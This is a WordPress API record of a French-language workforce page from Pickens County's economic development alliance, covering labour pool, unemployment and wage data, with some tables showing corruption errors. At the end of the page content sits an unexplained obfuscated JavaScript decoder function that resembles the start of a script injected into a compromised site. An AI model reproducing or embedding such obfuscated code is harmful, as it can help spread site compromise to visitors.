{"id":6057,"date":"2020-10-28T14:29:57","date_gmt":"2020-10-28T14:29:57","guid":{"rendered":"http:\/\/alliancepickens.com\/developpement-de-la-main-doeuvre\/"},"modified":"2020-10-28T14:29:58","modified_gmt":"2020-10-28T14:29:58","slug":"developpement-de-la-main-doeuvre","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/","title":{"rendered":"D\u00e9veloppement de la main-d\u2019\u0153uvre"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Introduction<\/h2>\n<p>Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>Disponibilit\u00e9<\/h2>\n<p>Avec plus de 400 000 travailleurs dans la zone d\u2019attraction de la main-d\u2019\u0153uvre du comt\u00e9, les entreprises nouvelles et existantes ont acc\u00e8s \u00e0 un groupe important et diversifi\u00e9 d\u2019employ\u00e9s potentiels. La Caroline du Sud jouit de relations stables employeur-employ\u00e9 en tant qu\u2019\u00c9tat du droit au travail et de l\u2019emploi \u00e0 volont\u00e9. Les entreprises qui cherchent \u00e0 prendre de l\u2019expansion ou \u00e0 d\u00e9m\u00e9nager dans la r\u00e9gion b\u00e9n\u00e9ficieront d\u2019un bassin de main-d\u2019\u0153uvre de qualit\u00e9 marqu\u00e9 par des salaires comp\u00e9titifs et de faibles niveaux de syndicalisation.<\/p>\n<p>Le bassin de main-d\u2019\u0153uvre provient du ch\u00f4mage et du sous-emploi des pourcentages des cinq (5) premiers navetteurs en \u00e2ge de travailler (entre vingt-cinq (25) et cinquante-quatre (54), selon le Bureau of Labor Statistics des \u00c9tats-Unis).[\/vc_column_text][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602084461637\" class=\"tableauPlaceholder\"><a href=\"#\"><img decoding=\"async\" alt=\" \" src=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" style=\"border: none\"><\/a>   <\/div>\n<p> var divElement = document.getElementById(&#8216;viz1602084461637&#8217;); var vizElement = divElement.getElementsByTagName(&#8216;object&#8217;)[0]; vizElement.style.width=&#8217;1015px&#8217;;vizElement.style.height=&#8217;750px&#8217;; var scriptElement = document.createElement(&#8216;script&#8217;); scriptElement.src = &#8216;https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js&#8217;; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; bg_type=&#8221;bg_color&#8221; bg_color_value=&#8221;#e3e3e3&#8243; css=&#8221;.vc_custom_1602106944486{padding-top: 50px !important;padding-bottom: 50px !important;}&#8221; el_class=&#8221;greybar&#8221;][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106834271{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Ch\u00f4mage<\/h3>\n<p>En raison de la comp\u00e9tence et l\u2019\u00e9thique de travail solide de ses r\u00e9sidents, le taux de <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11618\">ch\u00f4mage<\/a> du comt\u00e9 de Pickens est l\u2019un des plus bas de l\u2019\u00c9tat. Pour plus d\u2019informations, veuillez visiter le site Web de SC DEW.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106840509{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Sous-emploi<\/h3>\n<p>Les entreprises du comt\u00e9 de Pickens ont \u00e9galement acc\u00e8s \u00e0 un certain nombre d\u2019employ\u00e9s potentiels qui ont actuellement un emploi, mais <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11624\">poss\u00e8dent la formation, l\u2019exp\u00e9rience et l\u2019\u00e9ducation <\/a>qui les qualifie pour un meilleur emploi.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106846938{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Participation de la main-d\u2019\u0153uvre<\/h3>\n<p>La participation \u00e0 la main-d\u2019\u0153uvre est le nombre de personnes qui postulent pour un emploi ou qui occupent un emploi.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243; css=&#8221;.vc_custom_1602106856497{background-color: #ffffff !important;}&#8221;][vc_column_text]<\/p>\n<h3>Mod\u00e8les de d\u00e9placement<\/h3>\n<p>Les entreprises du comt\u00e9 de Pickens ont l\u2019avantage suppl\u00e9mentaire d\u2019attirer des employ\u00e9s qualifi\u00e9s de <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11639\">toute la r\u00e9gion.<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602085046029\" class=\"tableauPlaceholder\"><a href=\"#\"><img decoding=\"async\" alt=\" \" src=\"https:\/\/public.tableau.com\/static\/images\/Pk\/Pk_LABOR_initial_review\/CurrentLaborForce\/1_rss.png\" style=\"border: none\"><\/a>   <\/div>\n<p> var divElement = document.getElementById(&#8216;viz1602085046029&#8217;); var vizElement = divElement.getElementsByTagName(&#8216;object&#8217;)[0]; if ( divElement.offsetWidth &gt; 800 ) { vizElement.style.width=&#8217;1100px&#8217;;vizElement.style.height=&#8217;750px&#8217;;} else if ( divElement.offsetWidth &gt; 500 ) { vizElement.style.width=&#8217;1100px&#8217;;vizElement.style.height=&#8217;750px&#8217;;} else { vizElement.style.minWidth=&#8217;1100px&#8217;;vizElement.style.maxWidth=&#8217;100%&#8217;;vizElement.style.height=&#8217;1500px&#8217;;} var scriptElement = document.createElement(&#8216;script&#8217;); scriptElement.src = &#8216;https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js&#8217;; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3916&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<h2>Abordabilit\u00e9<\/h2>\n<p>[\/vc_column_text]<div id=\"advanced-tabs-desc-wrap-8889\" class=\"ult_tabs \" style=\" \" data-tabsstyle=\"style1\"\n data-titlebg=\"#03795b\" data-titlecolor=\"#ffffff\" data-fullheight=\"off\"\n data-titlehoverbg=\"#1d2c68\" data-titlehovercolor=\"#ffffff\"\n data-rotatetabs=\"0\" data-responsivemode=\"Both\" data-animation=\"Slide-Horizontal\"\ndata-activetitle=\"#ffffff\" data-activeicon=\"#ffffff\" data-activebg=\"#1d2c68\"  data-respmode=\"Tabs\" data-respwidth=\"400\" data-scroll = \"on\" data-activeindex=\"1\"><ul id=advanced-tabs-wrap-5293 class=\"ult_tabmenu style1 \" style=\"\"><li class=\"ult_tab_li   \" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\" style=\"background-color:#03795b;border-color:transparent;border-width:0px;border-style:solid;border-top-left-radius:0px;\">\n\t\t\t\t\t<a href=\"#1602110866916-4\" id=\"1602110866916-4\" style=\"color:#ffffff;;  \" class=\"ult_a \">\n\t\t\t\t\t   <span class=\"ult_tab_main  Both \">\n\t\t\t\t\t    <span class=\"ult_tab_section\">\n\t\t\t\t\t  \t\t<span  data-ultimate-target='#advanced-tabs-wrap-5293 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult-responsive\" style=\"\">Salaires: Tous les secteurs<\/span>\n\t\t\t\t\t\t   \t<span class=\"aio-icon none ult_tab_iconright\" style=\"color:#ffffff;font-size:15px;\">\n\t\t\t\t\t\t   \t<i class=\" icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t\t   <\/span>\n\t\t\t\t\t\t<\/span>\n\t\t\t\t\t   <\/span>\n\n\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/li><li class=\"ult_tab_li   \" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\" style=\"background-color:#03795b;border-color:transparent;border-width:0px;border-style:solid;border-top-right-radius:0px;\">\n\t\t\t\t\t<a href=\"#1602110866976-8\" id=\"1602110866976-8\" style=\"color:#ffffff;;  \" class=\"ult_a \">\n\t\t\t\t\t   <span class=\"ult_tab_main  Both \">\n\t\t\t\t\t    <span class=\"ult_tab_section\">\n\t\t\t\t\t  \t\t<span  data-ultimate-target='#advanced-tabs-wrap-5293 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult-responsive\" style=\"\">Salaires de fabrication<\/span>\n\t\t\t\t\t\t   \t<span class=\"aio-icon none ult_tab_iconright\" style=\"color:#ffffff;font-size:15px;\">\n\t\t\t\t\t\t   \t<i class=\" icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t\t   <\/span>\n\t\t\t\t\t\t<\/span>\n\t\t\t\t\t   <\/span>\n\n\t\t\t\t\t<\/a>\n\t\t\t\t\t<\/li><\/ul><div  data-ultimate-target='#advanced-tabs-desc-wrap-8889 .ult_tabcontent .ult_tab_min_contain  p'  data-responsive-json-new='{\"font-size\":\"\",\"line-height\":\"\"}' class=\"ult_tabcontent ult-responsive style1\" style=\"color:#74777b;\"><div class=\"ult_tab_min_contain \" >\n\t\t\t<div  class=\"ult_tabitemname\"  >\n\t\t\t\t[vc_column_text]L\u2019abordabilit\u00e9 de la main-d\u2019\u0153uvre locale dans tous les secteurs permet aux entreprises nouvelles et en expansion de diverses industries de recruter des talents de premier plan pour r\u00e9aliser d\u2019importantes \u00e9conomies.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c1\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t<\/div>\n\t\t\t<div  class=\"ult_tabitemname\"  >\n\t\t\t\t[vc_column_text]Avec les pr\u00e9occupations croissantes au sujet de la fabrication \u00e0 l\u2019\u00e9tranger, tels que l\u2019augmentation des co\u00fbts de main-d\u2019\u0153uvre, l\u2019augmentation des co\u00fbts de transport, et la mauvaise qualit\u00e9 de la production, la <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=16111\">main-d\u2019\u0153uvre de fabrication abordable et qualifi\u00e9e<\/a> du comt\u00e9 de Pickens fait de la r\u00e9gion un site id\u00e9al pour les entreprises envisageant l\u2019expansion, la r\u00e9installation ou la d\u00e9localisation.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c2\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t<\/div><\/div><\/div><\/div><div class=\"ult_acord advanced-tabs-desc-wrap-8889\">\n   <div class=\"ult-tabto-accordion \" style=\"width:;\"\n    data-titlecolor=\"#ffffff\"  data-titlebg=\"#03795b\"\n     data-titlehoverbg=\"#1d2c68\" data-titlehovercolor=\"#ffffff\" data-animation=\"Slide-Horizontal\"\n     data-activetitle=\"#ffffff\" data-activeicon=\"#ffffff\" data-activebg=\"#1d2c68\" data-scroll = \"on\" data-activeindex=\"1\" >\n     <dl><dt class=\"\">\n        \t<a class=\"ult-tabto-actitle withBorder ult_a\" id=\"1602110866916-4\" style=\"color:#ffffff;;background-color:#03795b;border-bottom-color:transparent;border-bottom-width:0px;border-bottom-style:solid;\" href=\"#1602110866916-4\">\n        \t\t<i class=\"accordion-icon\"><\/i>\n        \t\t\t<span class=\"ult_tab_main ult_ac_mainBoth\">\n\t\t\t\t\t   <span  data-ultimate-target='#advanced-tabs-wrap-5293 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult_acordian-text ult-responsive\" style=\";color:inherit \" >Salaires: Tous les secteurs<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t   <div class=\"aio-icon none \" style=\"color:#ffffff;font-size:15px;\" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\">\n\t\t\t\t\t   <i class=\"  icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t   <\/div>\n\t\t\t\t\t<\/a><\/dt>\n            \t\t<dd class=\"ult-tabto-accordionItem ult-tabto-accolapsed\">\n\t\t\t            <div class=\"ult-tabto-acontent\" style=\"color:#74777b;\">\n\t\t\t               [vc_column_text]L\u2019abordabilit\u00e9 de la main-d\u2019\u0153uvre locale dans tous les secteurs permet aux entreprises nouvelles et en expansion de diverses industries de recruter des talents de premier plan pour r\u00e9aliser d\u2019importantes \u00e9conomies.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c1\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t            <\/div>\n        \t<\/dd><dt class=\"\">\n        \t<a class=\"ult-tabto-actitle withBorder ult_a\" id=\"1602110866976-8\" style=\"color:#ffffff;;background-color:#03795b;border-bottom-color:transparent;border-bottom-width:0px;border-bottom-style:solid;border-bottom-color:transparent;border-bottom-width:0px;border-bottom-style:solid;\" href=\"#1602110866976-8\">\n        \t\t<i class=\"accordion-icon\"><\/i>\n        \t\t\t<span class=\"ult_tab_main ult_ac_mainBoth\">\n\t\t\t\t\t   <span  data-ultimate-target='#advanced-tabs-wrap-5293 .ult-span-text'  data-responsive-json-new='{\"font-size\":\"desktop:15px;\",\"line-height\":\"\"}'  class=\"ult-span-text ult_acordian-text ult-responsive\" style=\";color:inherit \" >Salaires de fabrication<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t   <div class=\"aio-icon none \" style=\"color:#ffffff;font-size:15px;\" data-iconcolor=\"#ffffff\" data-iconhover=\"#ffffff\">\n\t\t\t\t\t   <i class=\"  icomoon-the7-font-the7-arrow-21 ult_tab_icon\"  ><\/i>\n\t\t\t\t\t   <\/div>\n\t\t\t\t\t<\/a><\/dt>\n            \t\t<dd class=\"ult-tabto-accordionItem ult-tabto-accolapsed\">\n\t\t\t            <div class=\"ult-tabto-acontent\" style=\"color:#74777b;\">\n\t\t\t               [vc_column_text]Avec les pr\u00e9occupations croissantes au sujet de la fabrication \u00e0 l\u2019\u00e9tranger, tels que l\u2019augmentation des co\u00fbts de main-d\u2019\u0153uvre, l\u2019augmentation des co\u00fbts de transport, et la mauvaise qualit\u00e9 de la production, la <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=16111\">main-d\u2019\u0153uvre de fabrication abordable et qualifi\u00e9e<\/a> du comt\u00e9 de Pickens fait de la r\u00e9gion un site id\u00e9al pour les entreprises envisageant l\u2019expansion, la r\u00e9installation ou la d\u00e9localisation.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c2\u201d is corrupted!<\/div>[\/vc_column_text]\n\t\t\t            <\/div>\n        \t<\/dd>\n    \t<\/dl>\n    <!--<div class=\"extraborder\" style=\"background-color:#1d2c68\"><\/div>-->\n<\/div>\n\n<\/div>[\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h2>Besoin de sous-position<\/h2>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Introduction Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;18&#8243;&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6057","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>D\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"D\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Introduction Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;18&#8243;&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-10-28T14:29:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/\",\"name\":\"D\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"datePublished\":\"2020-10-28T14:29:57+00:00\",\"dateModified\":\"2020-10-28T14:29:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/#primaryimage\",\"url\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"contentUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/developpement-de-la-main-doeuvre\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"D\u00e9veloppement de la main-d\u2019\u0153uvre\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"D\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/","og_locale":"fr_FR","og_type":"article","og_title":"D\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Introduction Une base diversifi\u00e9e de l\u2019industrie continue de prosp\u00e9rer dans Pickens County.South Carolina.USA. Des facteurs tels que le d\u00e9veloppement continu de sites, l\u2019acc\u00e8s au march\u00e9 pour le commerce international et des mesures incitatives attrayantes aident \u00e0 r\u00e9pondre aux besoins de la d\u00e9localisation ou de l\u2019expansion des entreprises.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;18&#8243;&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-10-28T14:29:58+00:00","og_image":[{"url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/","url":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/","name":"D\u00e9veloppement de la main-d\u2019\u0153uvre - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/#primaryimage"},"thumbnailUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","datePublished":"2020-10-28T14:29:57+00:00","dateModified":"2020-10-28T14:29:58+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/#primaryimage","url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","contentUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/developpement-de-la-main-doeuvre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"D\u00e9veloppement de la main-d\u2019\u0153uvre"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=6057"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/6057\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=6057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}